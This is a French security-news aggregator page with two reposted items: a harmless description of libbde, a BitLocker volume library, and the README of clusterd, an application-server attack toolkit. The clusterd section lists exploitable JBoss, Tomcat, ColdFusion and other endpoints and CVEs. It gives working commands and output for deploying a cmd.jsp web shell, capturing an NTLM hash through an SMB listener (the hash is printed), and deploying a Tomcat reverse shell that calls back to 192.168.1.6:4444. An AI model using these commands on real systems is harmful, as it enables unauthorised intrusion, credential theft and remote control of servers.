May 10, 2015
echosystem image logo

Welcome to Echo'System'


G33k Inside
Ce site propose des outils pour webmaster et sysadmin, ainsi que les dernières news sur la sécurité.

IT / SECU / G33k

Sécurité informatique. (via RSS)

Actu des derniers potins informatiques / hardware / geek.(via RSS)

Stay protected.

Erreur32

Echo Rss Hot Security News


  • [News] libbde – Library and tools to access the BitLocker Drive Encryption (BDE) encrypted volumes. | More


    libbde is a library to access the BitLocker Drive Encryption (BDE) format. BitLocker Drive Encryption (BDE) is a volume-based encryption method used by  Microsoft Windows, as of Vista, to encrypt data on a storage media volume.

    Supported BDE formats:
    * BitLocker Windows Vista
    * BitLocker Windows 7
    * BitLocker Windows 8
    * BitLocker Windows 10
    * BitLocker To Go

    libbde

    Supported encryption methods:
    * AES-CBC
    * AES-XTS

    Supported protection methods:
    * clear key
    * password
    * recovery password
    * start-up key
    * FKEV and/or TWEAK key data

    Additional features:
    * support for partial encrypted volumes
    * zeros out the BDE metadata, matches behavior seen on Windows

    Usage and Build:

    Install dependencies:
    sudo apt install autoconf automake autopoint libtool pkg-config
    pacman -S autoconf automake autopoint libtool pkg-config
    yum install autoconf automake autopoint libtool pkg-config
    MinGW
    mingw-get install binutils mingw-runtime w32api libgmp libmpc libiconv pthreads gettext libz gcc-core mingw32-make msys
    
    git clone https://github.com/libyal/libbde.git && cd libbde
    ./synclibs.sh
    ./autogen.sh
    make
    
    MinGW:
    mingw32-configure --prefix=/opt/local/i386-mingw32 --enable-winapi=yes mingw32-make
    ./configure --host=i386-mingw32 --prefix=/opt/local/i386-mingw32 --enable-winapi=yes
    make
    
    cd bdetools
    ./bdeinfo -h
    ./bdemount -h

    Source: https://github.com/libyal



  • [News] clusterd - Application Server Attack Toolkit | More



    clusterd is an open source application server attack toolkit. Born out of frustration with current fingerprinting and exploitation methods, clusterd automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. See the wiki for more information.

    Requirements
    • Python >= 2.7.x
    • Requests >= 2.2.x

    Installation
    The recommended installation of clusterd is to clone the Github repository
    git clone https://github.com/hatRiot/clusterd.git

    clusterd features
    • clusterd currently supports six different application server platforms, with several more currently in development and research phases
    • JBoss
      • Versions 3.x - 8.1
      • Currently supported deployers:
        • /jmx-console/MainDeployer for 3.x, 4.x, and 6.x
        • /jmx-console/DeploymentFileRepository for 3.x, 4.x, and 5.x
        • /web-console/Invoker (MainDeployer) for 3.x, 4.x, and 6.x
        • /web-console/Invoker (BSHDeployer) for 3.x and 4.x
        • /invoker/JMXInvokerServlet for 3.x, 4.x, and 5.x
        • /invoker/EJBInvokerServlet for 3.x, 4.x, and 5.x
        • /management for 7.x, 8.x
        • SEAM2 for 5.1, 6.x
      • Dump deployed WARs
      • Fetch host OS information
      • Verb tampering vulnerability (CVE-2010-0738)
      • Credential/path disclosure (CVE-2005-2006)
    • ColdFusion
      • Versions 5 - 11
      • Currently supported deployers:
        • Task Scheduler for 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, and 11.x
        • FCKeditor for 8.x
        • LFI Log Injection 6.x, 7.x, and 8.x
      • Hash retrieval for versions 6 - 10
      • RDS admin bypass (CVE-2013-0632)
      • Pass the hash authentication for versions 7 - 9
    • WebLogic
      • Versions 7, 8.1, 11, and 12
      • Deployer over T3 and T3S currently tested against 11.x and 12.x
      • Dump deployed WARs over T3/T3S
      • Fetch host OS information
    • Tomcat
      • Versions 3.x - 8.x
      • Currently can deploy to all versions with an exposed manager interface
      • Dump deployed WARs
      • Fetch host OS information
    • Railo
      • Versions 3.x - 4.x
      • Currently supported deployers:
        • Task scheduler for 3.x and 4.x
        • Log injection for 3.x and 4.x
        • Thumbnail pre-auth RCE for 3.x and 4.x (up to 4.2.1)
      • Fetch host OS information
      • Pre-auth Password retrieval for 3.x - 4.2.1
    • Axis2
      • Versions 1.4 - 1.6
      • Currently supported deployers:
        • Admin interface for 1.4, 1.5, and 1.6
      • Fetch host OS information
      • View deployed services
      • Credential disclosure for 1.4
    • Glassfish
      • Versions 3.x - 4.x
      • View deployed services
      • Currently supported deployers:
        • Admin upload for 3.x and 4.x
    • Simple API for adding new platforms, fingerprints, deployers, and exploits
    • Various auxiliary modules for vulnerabilities and exploitation techniques

    examples / usage
    $ ./clusterd.py 

    clusterd/0.3.1 - clustered attack toolkit
    [Supporting 7 platforms]

    usage: ./clusterd.py [options]

    optional arguments:
    -h, --help show this help message and exit

    Connection:
    Options for configuring the connection

    -i [ip address] Server address
    -iL [file] Server list
    -p [port] Server port
    --proxy [proxy://server:port]
    Connect through proxy [http|https]
    --proxy-auth [username:password]
    Proxy credentials
    --timeout [seconds] Connection timeout [5s]
    --random-agent Use a random User-Agent for requests
    --ssl Force SSL

    Remote Host:
    Settings specific to the remote host

    -a [jboss|coldfusion|weblogic|tomcat|railo|axis2|glassfish]
    Hint at remote host service
    -o [windows|linux] Hint at remote host OS
    -v [version] Specific version to test
    --usr-auth [username:password]
    Login credentials for service
    --fingerprint Fingerprint the remote system
    --arch [x86|x64] Specify remote OS architecture

    Deploy:
    Deployment flags and settings

    --deploy [file] Deploy to the discovered service
    --undeploy [context] Undeploy file from server
    --deployer [deployer]
    Specify a deployer to use
    --invoke Invoke payload after deployment
    --rand-payload Use a random name for the deployed file
    -b [user] Brute force credentials for user [admin]
    --wordlist [path] Wordlist for brute forcing passwords

    Other:
    Miscellaneous flags

    --deployer-list List all available deployers
    --aux-list [platform]
    List all available exploits
    --gen-payload [host:port] for reverse connection
    Generate a reverse shell payload
    --discover [discovery_file]
    Attempt to discover application servers using the
    specified nmap gnmap output (use -sV when scanning)
    --listen [adapter] Adapter to listen on when needed
    -d Enable debug output
    -l Log output to file [$time$_log.log]
    jboss fingerprint and host info
    $ ./clusterd.py -i 192.168.1.105 -a jboss --jb-info --random-agent

    clusterd/0.3 - clustered attack toolkit
    [Supporting 6 platforms]

    [2014-05-25 10:57PM] Started at 2014-05-25 10:57PM
    [2014-05-25 10:57PM] Servers' OS hinted at windows
    [2014-05-25 10:57PM] Fingerprinting host '192.168.1.105'
    [2014-05-25 10:57PM] Server hinted at 'jboss'
    [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss Web Console...
    [2014-05-25 10:57PM] Checking jboss version 3.0 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss Web Console...
    [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss Web Console...
    [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Manager...
    [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Console...
    [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss Web Console...
    [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss Web Manager...
    [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss Web Manager...
    [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss JMX Console...
    [2014-05-25 10:57PM] Checking jboss version 7.1 JBoss Management...
    [2014-05-25 10:57PM] Checking jboss version 7.0 JBoss Management...
    [2014-05-25 10:57PM] Checking jboss version 8.0 JBoss Management...
    [2014-05-25 10:57PM] Checking jboss version Any JBoss EJB Invoker Servlet...
    [2014-05-25 10:57PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
    [2014-05-25 10:57PM] Checking jboss version Any JBoss JMX Invoker Servlet...
    [2014-05-25 10:57PM] Checking jboss version Any JBoss RMI Interface...
    [2014-05-25 10:57PM] Checking jboss version Any JBoss Status Page...
    [2014-05-25 10:57PM] Matched 7 fingerprints for service jboss
    [2014-05-25 10:57PM] JBoss JMX Console (version 5.0)
    [2014-05-25 10:57PM] JBoss Web Console (version 5.0)
    [2014-05-25 10:57PM] JBoss EJB Invoker Servlet (version Any)
    [2014-05-25 10:57PM] JBoss HTTP Headers (Unreliable) (version 5.0)
    [2014-05-25 10:57PM] JBoss JMX Invoker Servlet (version Any)
    [2014-05-25 10:57PM] JBoss RMI Interface (version Any)
    [2014-05-25 10:57PM] JBoss Status Page (version Any)
    [2014-05-25 10:57PM] Fingerprinting completed.
    [2014-05-25 10:57PM] Attempting to retrieve JBoss info...
    [2014-05-25 10:57PM] ActiveThreadCount: 68
    [2014-05-25 10:57PM] AvailableProcessors: 1
    [2014-05-25 10:57PM] OSArch: amd64
    [2014-05-25 10:57PM] MaxMemory: 518979584
    [2014-05-25 10:57PM] HostAddress: 192.168.1.105
    [2014-05-25 10:57PM] JavaVersion: 1.7.0_45
    [2014-05-25 10:57PM] OSVersion: 6.1
    [2014-05-25 10:57PM] TotalMemory: 286703616
    [2014-05-25 10:57PM] JavaVendor: Oracle Corporation
    [2014-05-25 10:57PM] ActiveThreadGroupCount: 9
    [2014-05-25 10:57PM] OSName: Windows 7
    [2014-05-25 10:57PM] FreeMemory: 122651808
    [2014-05-25 10:57PM] HostName: bryan-PC
    [2014-05-25 10:57PM] JavaVMVersion: 24.45-b08
    [2014-05-25 10:57PM] JavaVMVendor: Oracle Corporation
    [2014-05-25 10:57PM] JavaVMName: Java HotSpot(TM) 64-Bit Server VM
    [2014-05-25 10:57PM] Finished at 2014-05-25 10:57PM
    jboss DFS deployment against JBoss 5.0
    $ ./clusterd.py -i 192.168.1.105 -a jboss -v5.0 --deploy ./src/lib/resources/cmd.war --random-agent

    clusterd/0.3 - clustered attack toolkit
    [Supporting 6 platforms]

    [2014-05-25 11:00PM] Started at 2014-05-25 11:00PM
    [2014-05-25 11:00PM] Servers' OS hinted at windows
    [2014-05-25 11:00PM] Fingerprinting host '192.168.1.105'
    [2014-05-25 11:00PM] Server hinted at 'jboss'
    [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss JMX Console...
    [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss Web Console...
    [2014-05-25 11:00PM] Checking jboss version Any JBoss EJB Invoker Servlet...
    [2014-05-25 11:00PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
    [2014-05-25 11:00PM] Checking jboss version Any JBoss JMX Invoker Servlet...
    [2014-05-25 11:00PM] Checking jboss version Any JBoss RMI Interface...
    [2014-05-25 11:00PM] Checking jboss version Any JBoss Status Page...
    [2014-05-25 11:00PM] Matched 7 fingerprints for service jboss
    [2014-05-25 11:00PM] JBoss JMX Console (version 5.0)
    [2014-05-25 11:00PM] JBoss Web Console (version 5.0)
    [2014-05-25 11:00PM] JBoss EJB Invoker Servlet (version Any)
    [2014-05-25 11:00PM] JBoss HTTP Headers (Unreliable) (version 5.0)
    [2014-05-25 11:00PM] JBoss JMX Invoker Servlet (version Any)
    [2014-05-25 11:00PM] JBoss RMI Interface (version Any)
    [2014-05-25 11:00PM] JBoss Status Page (version Any)
    [2014-05-25 11:00PM] Fingerprinting completed.
    [2014-05-25 11:00PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] >
    [2014-05-25 11:00PM] Preparing to deploy cmd...
    [2014-05-25 11:00PM] Successfully deployed '/cmd/cmd.jsp'
    [2014-05-25 11:00PM] Finished at 2014-05-25 11:00PM
    jboss UNC hash retrieval
    $ sudo ./clusterd.py -i 192.168.1.105 -a jboss -v4.2 --random-agent --jb-smb

    clusterd/0.3 - clustered attack toolkit
    [Supporting 6 platforms]

    [2014-05-25 11:01PM] Started at 2014-05-25 11:01PM
    [2014-05-25 11:01PM] Servers' OS hinted at windows
    [2014-05-25 11:01PM] Fingerprinting host '192.168.1.105'
    [2014-05-25 11:01PM] Server hinted at 'jboss'
    [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss JMX Console...
    [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss Web Console...
    [2014-05-25 11:01PM] Checking jboss version Any JBoss EJB Invoker Servlet...
    [2014-05-25 11:01PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
    [2014-05-25 11:01PM] Checking jboss version Any JBoss JMX Invoker Servlet...
    [2014-05-25 11:01PM] Checking jboss version Any JBoss RMI Interface...
    [2014-05-25 11:01PM] Checking jboss version Any JBoss Status Page...
    [2014-05-25 11:01PM] Matched 7 fingerprints for service jboss
    [2014-05-25 11:01PM] JBoss JMX Console (version 4.2)
    [2014-05-25 11:01PM] JBoss Web Console (version 4.2)
    [2014-05-25 11:01PM] JBoss EJB Invoker Servlet (version Any)
    [2014-05-25 11:01PM] JBoss HTTP Headers (Unreliable) (version 4.2)
    [2014-05-25 11:01PM] JBoss JMX Invoker Servlet (version Any)
    [2014-05-25 11:01PM] JBoss RMI Interface (version Any)
    [2014-05-25 11:01PM] JBoss Status Page (version Any)
    [2014-05-25 11:01PM] Fingerprinting completed.
    [2014-05-25 11:01PM] Setting up SMB listener..
    [2014-05-25 11:01PM] Invoking UNC loader...
    [2014-05-25 11:01PM] bryan::bryan-PC:1122334455667788:34826253d353ebca4811bd08be0db067:01010000000000003dac35999f78cf019df7c49c7268a5f600000000020000000000000000000000
    [2014-05-25 11:01PM] Finished at 2014-05-25 11:01PM
    tomcat deployment and reverse shell invocation
    $ ./clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

    clusterd/0.3 - clustered attack toolkit
    [Supporting 6 platforms]

    [2014-05-25 10:53PM] Started at 2014-05-25 10:53PM
    [2014-05-25 10:53PM] Generating payload....
    [2014-05-25 10:53PM] Payload generated (shell.war). Payload: java/jsp_shell_reverse_tcp
    [2014-05-25 10:53PM] Servers' OS hinted at windows
    [2014-05-25 10:53PM] Fingerprinting host '192.168.1.105'
    [2014-05-25 10:53PM] Server hinted at 'tomcat'
    [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat...
    [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat Manager...
    [2014-05-25 10:53PM] Matched 2 fingerprints for service tomcat
    [2014-05-25 10:53PM] Tomcat (version 5.5)
    [2014-05-25 10:53PM] Tomcat Manager (version 5.5)
    [2014-05-25 10:53PM] Fingerprinting completed.
    [2014-05-25 10:53PM] Preparing to deploy /tmp/.clusterd/z1dgi.war...
    [2014-05-25 10:53PM] Deployed /tmp/.clusterd/z1dgi.war to /z1dgi
    [2014-05-25 10:53PM] z1dgi invoked at 192.168.1.105
    [2014-05-25 10:53PM] Finished at 2014-05-25 10:53PM